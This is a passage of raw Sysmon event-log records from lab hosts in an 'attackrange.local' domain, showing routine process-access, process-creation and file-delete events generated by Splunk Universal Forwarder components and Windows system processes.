Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808160Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:27.659{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F56F-60EB-8D79-00000000D001}4048C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808159Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:27.659{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808158Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:27.659{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808157Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:27.659{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808156Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:27.659{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808155Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:27.659{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808154Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:27.659{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808153Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:27.659{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808152Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:27.659{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808151Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:27.659{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808150Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:27.659{0C1E0330-048F-60E8-0500-00000000D001}412996C:\Windows\system32\csrss.exe{0C1E0330-F56F-60EB-8D79-00000000D001}4048C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000808149Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:27.659{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F56F-60EB-8D79-00000000D001}4048C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000808148Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:27.644{0C1E0330-F56F-60EB-8D79-00000000D001}4048C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000808147Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:27.628{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A3CDD12DB173713E7CB1A653B9BF5A7E,SHA256=006BC7761EAC7BF20894D5784BA7AAC6553903234684B363726A4449F02F2E37,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000808146Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:27.112{0C1E0330-F56E-60EB-8C79-00000000D001}5043480C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001050130Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:28.848{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A9AAA15346713F3BBD060F20DDAA2C97,SHA256=AFB96BC193A12F3C50EE1D910DD85CA7FD8B1B004F06797D85F7312B9C12FE04,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808176Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:28.721{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=13FF198357ABC3FB62BC357FD60293D1,SHA256=B025F6FB91659B3B0A91B659F24B91848712DFF4CCC50E1593FA36EF989D1D73,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000808175Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:28.346{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F570-60EB-8E79-00000000D001}1868C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808174Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:28.346{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808173Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:28.346{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808172Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:28.346{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808171Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:28.346{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808170Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:28.346{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808169Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:28.346{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808168Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:28.346{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808167Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:28.346{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808166Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:28.346{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808165Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:28.346{0C1E0330-048F-60E8-0500-00000000D001}412528C:\Windows\system32\csrss.exe{0C1E0330-F570-60EB-8E79-00000000D001}1868C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000808164Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:28.346{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program 